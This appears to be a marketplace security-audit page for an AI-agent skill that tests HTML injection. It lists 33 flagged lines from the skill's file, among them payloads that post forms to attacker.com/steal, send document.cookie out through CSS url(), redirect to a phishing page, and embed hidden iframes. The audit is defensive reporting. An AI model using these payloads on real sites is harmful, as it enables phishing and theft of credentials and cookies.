Skip to main content

html-injection-testing

Identifies and exploits HTML injection vulnerabilities in web applications, providing reports and remediation guidance.

Install this skill

or
55/100

Security score

The html-injection-testing skill was audited on Mar 5, 2026 and we found 33 security issues across 3 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 128

Curl to non-GitHub URL

SourceSKILL.md
128curl "http://target.com/search?q=<h1>Test</h1>"
medium line 131

Curl to non-GitHub URL

SourceSKILL.md
131curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"
medium line 134

Curl to non-GitHub URL

SourceSKILL.md
134curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
low line 332

Unicode escape sequences

SourceSKILL.md
332\u003ch1\u003eUnicode\u003c/h1\u003e
low line 470

Unicode escape sequences

SourceSKILL.md
470| Unicode | `\u003c` = `<` |
low line 117

External URL reference

SourceSKILL.md
117<a href="http://attacker.com">Click Here</a>
low line 118

External URL reference

SourceSKILL.md
118<a href="http://attacker.com">Legitimate Link</a>
low line 121

External URL reference

SourceSKILL.md
121<img src="http://attacker.com/image.png">
low line 128

External URL reference

SourceSKILL.md
128curl "http://target.com/search?q=<h1>Test</h1>"
low line 131

External URL reference

SourceSKILL.md
131curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"
low line 134

External URL reference

SourceSKILL.md
134curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
low line 148

External URL reference

SourceSKILL.md
148<p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
low line 153

External URL reference

SourceSKILL.md
153<form action="http://attacker.com/steal" method="POST">
low line 166

External URL reference

SourceSKILL.md
166http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">
low line 169

External URL reference

SourceSKILL.md
169http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>
low line 179

External URL reference

SourceSKILL.md
179http://target.com/submit
low line 183

External URL reference

SourceSKILL.md
183http://target.com/register
low line 192

External URL reference

SourceSKILL.md
192http://target.com/page/<h1>Injected</h1>
low line 195

External URL reference

SourceSKILL.md
195http://target.com/users/<img src=x>/profile
low line 208

External URL reference

SourceSKILL.md
208<form action="http://attacker.com/capture" method="POST">
low line 219

External URL reference

SourceSKILL.md
219input { background: url('http://attacker.com/log?data=') }
low line 221

External URL reference

SourceSKILL.md
221<form action="http://attacker.com/steal" method="POST">
low line 230

External URL reference

SourceSKILL.md
230http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%2
low line 252

External URL reference

SourceSKILL.md
252<img src="http://attacker.com/defaced.jpg"
low line 268

External URL reference

SourceSKILL.md
268body { background: url('http://attacker.com/track?cookie='+document.cookie) }
low line 274

External URL reference

SourceSKILL.md
274<div style="background:url('http://attacker.com/log')">Content</div>
low line 281

External URL reference

SourceSKILL.md
281<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">
low line 291

External URL reference

SourceSKILL.md
291<form action="http://attacker.com/steal">
low line 302

External URL reference

SourceSKILL.md
302<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>
low line 305

External URL reference

SourceSKILL.md
305<iframe src="http://attacker.com/track" style="display:none"></iframe>
low line 369

External URL reference

SourceSKILL.md
369target = "http://target.com/search"
low line 377

External URL reference

SourceSKILL.md
377"<a href='http://evil.com'>Click</a>",
low line 380

External URL reference

SourceSKILL.md
380"<iframe src='http://evil.com'></iframe>",
Scanned on Mar 5, 2026
View Security Dashboard
Installation guide →